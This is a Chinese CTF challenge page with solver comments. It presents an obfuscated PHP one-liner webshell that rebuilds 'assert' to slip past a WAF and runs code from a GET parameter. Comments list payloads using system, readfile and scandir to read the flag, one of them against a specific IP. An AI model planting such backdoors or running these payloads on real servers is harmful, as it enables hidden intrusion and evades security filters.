shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8208
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
b2026tf 7天前

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0

syhaisy 13天前

20702af5309ab1f70e0f7e8a81076a4e

回复 0

hualong 15天前

直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);

回复 0

dlccom 19天前

?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag

回复 0

谢特恒123 1月前

这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法

回复 0

kitniu 1月前

?s=system(dir),然后进入txt文件,flag{********}

回复 1

攻防小哥 1月前

flag{********}

回复 0

smartada 2月前

flag{****}

回复 0

十里故清云 2月前

?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用

回复 0

TS3Rrrr 3月前

大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别

回复 0
windfalls 3天前

这个提示很重要,免杀一句话木马,assert($_GET['s'])

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

doushabao 攻破了该题 25分钟前
Tomato薯条 攻破了该题 1小时前
yuu鱼 攻破了该题 2小时前
box 攻破了该题 10小时前
yinlin 攻破了该题 18小时前
我不是张先茂 攻破了该题 1天前
临安 攻破了该题 1天前
yyy1024 攻破了该题 1天前
周文君 攻破了该题 1天前
fu11dreamer 攻破了该题 1天前
yanqiu 攻破了该题 1天前
liu121389 攻破了该题 1天前
旦旦 攻破了该题 1天前
ZemoLee 攻破了该题 1天前
sokfock 攻破了该题 1天前
白科技 攻破了该题 1天前
be yourself 攻破了该题 1天前
Shining果果 攻破了该题 1天前
zzx 攻破了该题 1天前
3167107269 攻破了该题 2天前
问题反馈